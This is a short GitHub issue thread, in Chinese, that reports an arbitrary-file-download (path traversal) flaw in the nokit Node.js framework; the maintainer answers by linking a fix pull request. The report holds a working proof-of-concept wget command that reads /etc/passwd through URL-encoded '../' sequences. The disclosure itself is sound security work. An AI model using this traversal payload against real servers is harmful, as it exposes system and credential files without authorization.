### ISSUE TITLE
任意文件下载漏洞

### ISSUE THREAD

**Issue by Samurais** [nokitjs/nokit#76]
使用 nokit 构建服务，比如 https://github.com/Houfeng/cize, 存在“任意文件下载漏洞”。

启动 cize, 然后执行。

```
 wget http://localhost:9001/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
```

![image](https://user-images.githubusercontent.com/3538629/34195430-763f7ee6-e598-11e7-8b81-8ff5f51459c7.png)

漏洞背景：http://www.lijiejie.com/python-django-directory-traversal/

**Comment by Houfeng** [comment]
记得 Nokit 中有，针对这个问题的处理，稍候我检查一下。

**Comment by Houfeng** [comment]
https://github.com/nokitjs/nokit/pull/77
